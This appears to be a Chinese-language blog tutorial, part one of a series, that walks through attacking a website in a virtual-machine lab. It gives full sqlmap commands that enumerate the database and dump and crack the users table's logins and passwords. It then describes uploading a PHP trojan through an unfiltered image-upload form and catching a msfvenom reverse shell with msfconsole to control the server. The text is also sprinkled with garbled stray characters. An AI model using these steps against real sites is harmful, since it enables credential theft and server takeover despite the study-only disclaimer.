如何获取网站用户名及密码以及上传木马系列教程之一

 

说明:此篇文章(包含演示用的软件等)仅供学习及交流使用,严禁用于其余用途。php

咱们不少人在登录网站的时候,都须要输入用户名和密码进行登录,假入咱们没有用户名和密码时,怎么登录呢?通常常见思路有如下几种:sql

1.普通人都知道的:暴力破解。数据库

2.利用网站的漏洞(SQL注入等)。服务器

3.利用服务器上的系统漏洞或者软件漏洞。工具

4.社会工程。学习

 

在这里,我会对以上几种常见思路进行演示和说明,固然这一篇讲的主要是利用SQL注入 GET型注入漏洞。如下的演示环境我是搭建于虚拟机中,进行演示和测试,稍后我会将测试环境打包放在百度云上,供有须要的朋友进行下载。测试

 

1.使用OWASP ZAP扫描目标网站,查看是否存在相关漏洞。网站

 

 

 2.查看是由具备SQL GET类型注入点3d

 

 

 

3. 使用工具SQLMAP 进行注入测试blog

(1)爆库:sqlmap -u "http://192.168.0.212/cat.php?id=3" --dbs

 

 

 (2)爆表:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" --tables

 

 

 (3)爆字段名:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" -T "users" --columns

 

 

 

 

 

 

 

(4)爆数据库里面的用户名和密码:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump

 

 

 

好了等待一会,发现密码是使用MD5进行保护的,咱们并不知道密码,没事,继续等待一会,sqlmap会使用默认的字典进行破解,等待一会,破解完成,获得了咱们想要的用户名和密码:

 

 

 而后咱们使用获得的用户名和密码登录系统。

 

进入登录页面,输入相应的用户名和密码,Well,登录成功。

 

 

 

系统登录成功以后,咱们查看是否存在上传漏洞,在网站上查找一会,咱们看到了有上传图片的接口,咱们对该接口进行测试,发现具备文件上传权限,而且文件过滤名,没有包含.PHP文件,所以,咱们能够上传

.PHP的木马来获取系统的最高权限。

 

 

 4.使用msfvenom生产反弹型木马

 

 

 

 

 

 5.监听本地端口,等待反弹木马的链接

访问木马文件,木马文件,会向咱们的TCP端口发起一个链接,从而反向控制服务器。

咱们首打开本地监听端口,等待木马的反向链接:

这里使用监听的是msfconsole工具,启动msfconsole:

 

 

设置相关参数,而后启动监听

 

 好了,已经创建服务器的反向链接了,能够远程控制计算机了。

相关文章
相关标签/搜索